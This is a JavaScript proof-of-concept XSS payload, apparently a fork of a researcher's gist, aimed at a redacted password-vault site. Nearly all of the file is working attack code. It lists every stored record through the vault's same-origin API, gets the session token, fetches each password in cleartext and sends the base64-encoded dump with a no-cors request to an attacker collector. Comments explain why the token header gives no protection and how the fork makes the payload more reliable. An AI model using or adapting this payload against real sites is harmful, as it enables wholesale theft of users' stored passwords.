Forked from shawarkhanethicalhacker/password_vault_exploit.js
Proof-of-concept XSS payload that, once executed in the vault's origin (redacted.com) in a victim's browser, enumerates every stored record through the vault's own in-page API, retrieves the cleartext of each one, and exfiltrates the dump to an attacker-controlled endpoint.
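// Exploit code by Shawar Khan (proof of concept).
//
// This payload is meant to run from an XSS on redacted.com, i.e. inside the
// victim's browser and in the vault's own origin. Every API request below is
// therefore same-origin: the browser attaches the victim's session cookies
// automatically and no CORS preflight stands in the way. Note that the
// per-session `token` header the record endpoint demands is itself obtainable
// with a plain same-origin GET (/api/v1/session/token), so it offers no
// protection against script that already executes in the origin.
'use strict';

// Origin of the vulnerable vault (redacted in the public write-up).
var VAULT = 'https://redacted.com';
// Attacker-controlled collector; 127.0.0.1 is the placeholder used while testing.
var EXFIL_URL = 'http://127.0.0.1/';

// Accumulates the dumped records. Kept as a global so it can be inspected from
// the console while the payload is being debugged.
var data_chunks = '';

// Fetches a JSON body and rejects on a non-2xx status, so an HTML error page
// is never handed to JSON.parse.
function fetchJson(url, init) {
  return fetch(url, init).then(function (resp) {
    if (!resp.ok) {
      throw new Error(url + ' returned HTTP ' + resp.status);
    }
    return resp.json();
  });
}

// Extracts record ids from the /api/v3/records/all response. The observed
// shape is an object under `records` whose values are arrays; the original
// payload read the id of the first element of each array and that is kept
// here (TODO confirm against the real response if the API has changed).
function extractRecordIds(allRecords) {
  return Object.entries(allRecords.records).map(function (entry) {
    return entry[1][0].id;
  });
}

// Formats one record exactly as the original payload did: the description,
// then the first three detail values, one per line, followed by a blank line.
// A record with fewer than three details no longer throws; missing values are
// simply omitted.
function formatRecord(record) {
  var details = Array.isArray(record.details) ? record.details : [];
  var lines = [record.description].concat(
    details.slice(0, 3).map(function (d) { return d.value; })
  );
  return lines.join('\n') + '\n\n';
}

// Retrieves the cleartext of a single record. The endpoint requires the
// session token as a `token` header in addition to the session cookie.
function grabPassword(sessionToken, recordId) {
  return fetchJson(VAULT + '/api/v1/passwords/record', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json;charset=UTF-8',
      token: sessionToken,
    },
    body: JSON.stringify({ id: recordId, is_organization: false }),
  }).then(function (parsed) {
    return formatRecord(parsed.record);
  });
}

// Base64-encodes arbitrary text for the query string. btoa() only accepts
// Latin-1 and throws on anything else, so the text is UTF-8 encoded first;
// the base64 is then URL-encoded because '+' and '/' are not query-safe.
function encodeForExfil(text) {
  var bytes = new TextEncoder().encode(text);
  var binary = '';
  bytes.forEach(function (b) {
    binary += String.fromCharCode(b);
  });
  return encodeURIComponent(btoa(binary));
}

// 1. enumerate record ids, 2. obtain the session token, 3. fetch every record
// in parallel and wait for ALL of them -- the original fired the exfil after a
// fixed 2 s setTimeout, which silently dropped whatever had not arrived yet --
// 4. send the dump to the collector.
fetchJson(VAULT + '/api/v3/records/all')
  .then(function (allRecords) {
    var recordIds = extractRecordIds(allRecords);
    return fetchJson(VAULT + '/api/v1/session/token').then(function (tokenResp) {
      var sessionToken = tokenResp.session_token;
      return Promise.all(recordIds.map(function (id) {
        return grabPassword(sessionToken, id);
      }));
    });
  })
  .then(function (chunks) {
    data_chunks = chunks.join('');
    // Cross-origin GET to the collector. 'no-cors' lets the request leave
    // without the promise rejecting over the (irrelevant) opaque response.
    return fetch(EXFIL_URL + '?data=' + encodeForExfil(data_chunks), {
      mode: 'no-cors',
    });
  })
  .catch(function (err) {
    // Surface failures while testing instead of failing silently.
    console.error('vault dump failed:', err);
  });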